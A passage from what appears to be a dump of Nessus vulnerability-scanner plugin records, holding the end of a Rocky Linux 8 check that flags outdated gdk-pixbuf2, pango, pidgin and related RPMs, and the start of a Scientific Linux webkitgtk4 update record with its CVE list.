value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1723836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1724551\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1725101\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1725107\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1725120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1725555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1725741\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1725766\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1725854\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1726093\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1726505\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1726656\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1728277\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1731372\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1735382\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1737326\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1739116\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1739117\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1741547\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8689\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-8735\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/11/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-xlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-xlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gdk-pixbuf2-xlib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gnome-desktop3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gnome-desktop3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gnome-desktop3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:gnome-desktop3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:libpurple-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pango\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pango-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pango-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pango-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pidgin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pidgin-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RockyLinux/release');\nif (isnull(os_release) || 'Rocky Linux' >!< os_release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 8.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n {'reference':'gdk-pixbuf2-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-debuginfo-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-debuginfo-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-debuginfo-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-debugsource-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-debugsource-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-debugsource-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-debuginfo-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-debuginfo-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-devel-debuginfo-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-debuginfo-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-debuginfo-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-modules-debuginfo-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-debuginfo-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-debuginfo-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-debuginfo-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-devel-2.36.12-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-devel-2.36.12-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gdk-pixbuf2-xlib-devel-2.36.12-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-3.32.2-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-debuginfo-3.32.2-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-debuginfo-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-debugsource-3.32.2-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-debugsource-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-devel-3.32.2-1.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gnome-desktop3-devel-3.32.2-1.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-debuginfo-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-debuginfo-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-debuginfo-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-devel-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-devel-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpurple-devel-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-1.42.4-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-1.42.4-6.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-1.42.4-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-debuginfo-1.42.4-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-debuginfo-1.42.4-6.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-debuginfo-1.42.4-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-debugsource-1.42.4-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-debugsource-1.42.4-6.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-debugsource-1.42.4-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-devel-1.42.4-6.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-devel-1.42.4-6.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pango-devel-1.42.4-6.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-debuginfo-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-debuginfo-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-debuginfo-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-debugsource-2.13.0-5.el8', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-debugsource-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-debugsource-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-devel-2.13.0-5.el8', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pidgin-devel-2.13.0-5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'gdk-pixbuf2 / gdk-pixbuf2-debuginfo / gdk-pixbuf2-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:11:15", "description": "Security Fix(es) :\n\n - webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251, CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644, CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763, CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769, CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823, CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862, CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885, CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900, CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793)", "cvss3": {}, "published": "2020-10-21T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : webkitgtk4 on SL7.x x86_64 (20201001)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902"], "modified": "2022-05-27T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:webkitgtk4", "p-cpe:/a:fermilab:scientific_linux:webkitgtk4-debuginfo", "p-cpe:/a:fermilab:scientific_linux:webkitgtk4-devel", "p-cpe:/a:fermilab:scientific_linux:webkitgtk4-doc", "p-cpe:/a:fermilab:scientific_linux:webkitgtk4-jsc", "p-cpe:/a:fermilab:scientific_linux:webkitgtk4-jsc-devel", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20201001_WEBKITGTK4_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/141759", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141759);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/27\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6237\", \"CVE-2019-6251\", \"CVE-2019-8506\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8571\", \"CVE-2019-8583\", \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\", \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\", \"CVE-2019-8607\", \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\", \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\", \"CVE-2019-8625\", \"CVE-2019-8644\", \"CVE-2019-8649\", \"CVE-2019-8658\", \"CVE-2019-8666\", \"CVE-2019-8669\", \"CVE-2019-8671\", \"CVE-2019-8672\", \"CVE-2019-8673\", \"CVE-2019-8674\", \"CVE-2019-8676\", \"CVE-2019-8677\", \"CVE-2019-8678\", \"CVE-2019-8679\", \"CVE-2019-8680\", \"CVE-2019-8681\", \"CVE-2019-8683\", \"CVE-2019-8684\", \"CVE-2019-8686\", \"CVE-2019-8687\", \"CVE-2019-8688\", \"CVE-2019-8689\", \"CVE-2019-8690\", \"CVE-2019-8707\", \"CVE-2019-8710\", \"CVE-2019-8719\", \"CVE-2019-8720\", \"CVE-2019-8726\", \"CVE-2019-8733\", \"CVE-2019-8735\", \"CVE-2019-8743\", \"CVE-2019-8763\", \"CVE-2019-8764\", \"CVE-2019-8765\", \"CVE-2019-8766\", \"CVE-2019-8768\", \"CVE-2019-8769\", \"CVE-2019-8771\", \"CVE-2019-8782\", \"CVE-2019-8783\", \"CVE-2019-8808\", \"CVE-2019-8811\", \"CVE-2019-8812\", \"CVE-2019-8813\", \"CVE-2019-8814\", \"CVE-2019-8815\", \"CVE-2019-8816\", \"CVE-2019-8819\", \"CVE-2019-8820\", \"CVE-2019-8821\", \"CVE-2019-8822\", \"CVE-2019-8823\", \"CVE-2019-8835\", \"CVE-2019-8844\", \"CVE-2019-8846\", \"CVE-2020-10018\", \"CVE-2020-11793\", \"CVE-2020-3862\", \"CVE-2020-3864\", \"CVE-2020-3865\", \"CVE-2020-3867\", \"CVE-2020-3868\", \"CVE-2020-3885\", \"CVE-2020-3894\", \"CVE-2020-3895\", \"CVE-2020-3897\", \"CVE-2020-3899\", \"CVE-2020-3900\", \"CVE-2020-3901\", \"CVE-2020-3902\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n\n script_name(english:\"Scientific Linux Security Update : webkitgtk4 on SL7.x x86_64 (20201001)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security Fix(es) :\n\n - webkitgtk: Multiple security issues (CVE-2019-6237,\n CVE-2019-6251, CVE-2019-8506, CVE-2019-8524,\n CVE-2019-8535, CVE-2019-8536, CVE-2019-8544,\n CVE-2019-8551, CVE-2019-8558, CVE-2019-8559,\n CVE-2019-8563, CVE-2019-8571, CVE-2019-8583,\n CVE-2019-8584, CVE-2019-8586, CVE-2019-8587,\n CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,\n CVE-2019-8608, CVE-2019-8609, CVE-2019-8610,\n CVE-2019-8611, CVE-2019-8615, CVE-2019-8619,\n CVE-2019-8622, CVE-2019-8623, CVE-2019-8625,\n CVE-2019-8644, CVE-2019-8649, CVE-2019-8658,\n CVE-2019-8666, CVE-2019-8669, CVE-2019-8671,\n CVE-2019-8672, CVE-2019-8673, CVE-2019-8674,\n CVE-2019-8676, CVE-2019-8677, CVE-2019-8678,\n CVE-2019-8679, CVE-2019-8680, CVE-2019-8681,\n CVE-2019-8683, CVE-2019-8684, CVE-2019-8686,\n CVE-2019-8687, CVE-2019-8688, CVE-2019-8689,\n CVE-2019-8690, CVE-2019-8707, CVE-2019-8710,\n CVE-2019-8719, CVE-2019-8720, CVE-2019-8726,\n CVE-2019-8733, CVE-2019-8735, CVE-2019-8743,\n CVE-2019-8763, CVE-2019-8764, CVE-2019-8765,\n CVE-2019-8766, CVE-2019-8768, CVE-2019-8769,\n CVE-2019-8771, CVE-2019-8782, CVE-2019-8783,\n CVE-2019-8808, CVE-2019-8811, CVE-2019-8812,\n CVE-2019-8813, CVE-2019-8814, CVE-2019-8815,\n CVE-2019-8816, CVE-2019-8819, CVE-2019-8820,\n CVE-2019-8821, CVE-2019-8822, CVE-2019-8823,\n CVE-2019-8835, CVE-2019-8844, CVE-2019-8846,\n CVE-2019-11070, CVE-2020-3862, CVE-2020-3864,\n CVE-2020-3865, CVE-2020-3867, CVE-2020-3868,\n CVE-2020-3885, CVE-2020-3894, CVE-2020-3895,\n CVE-2020-3897, CVE-2020-3899, CVE-2020-3900,\n CVE-2020-3901, CVE-2020-3902, CVE-2020-10018,\n CVE-2020-11793)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2010&L=SCIENTIFIC-LINUX-ERRATA&P=5351\n script_set_attribute(\n attribute:\"see_also\",\n 